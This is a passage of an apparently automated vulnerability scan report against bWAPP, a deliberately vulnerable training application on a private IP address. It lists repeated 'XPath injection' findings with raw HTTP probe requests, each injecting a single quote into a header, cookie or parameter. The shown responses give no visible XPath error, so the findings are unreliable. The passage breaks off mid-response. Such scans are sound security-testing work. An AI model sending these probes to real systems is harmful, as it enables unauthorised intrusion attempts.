<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.84. http://192.168.52.147/bWAPP/bof_1.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:52 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.85. http://192.168.52.147/bWAPP/bof_1.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:42 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.86. http://192.168.52.147/bWAPP/bof_1.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.87. http://192.168.52.147/bWAPP/bof_1.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.88. http://192.168.52.147/bWAPP/bof_1.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.89. http://192.168.52.147/bWAPP/bof_1.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.90. http://192.168.52.147/bWAPP/bof_1.php [movie_genre cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.91. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:26 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.92. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:16 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.93. http://192.168.52.147/bWAPP/bof_1.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.94. http://192.168.52.147/bWAPP/bof_1.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.95. http://192.168.52.147/bWAPP/bof_1.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13163

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.96. http://192.168.52.147/bWAPP/bof_2.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.97. http://192.168.52.147/bWAPP/bof_2.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.98. http://192.168.52.147/bWAPP/bof_2.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.99. http://192.168.52.147/bWAPP/bof_2.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.100. http://192.168.52.147/bWAPP/bof_2.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
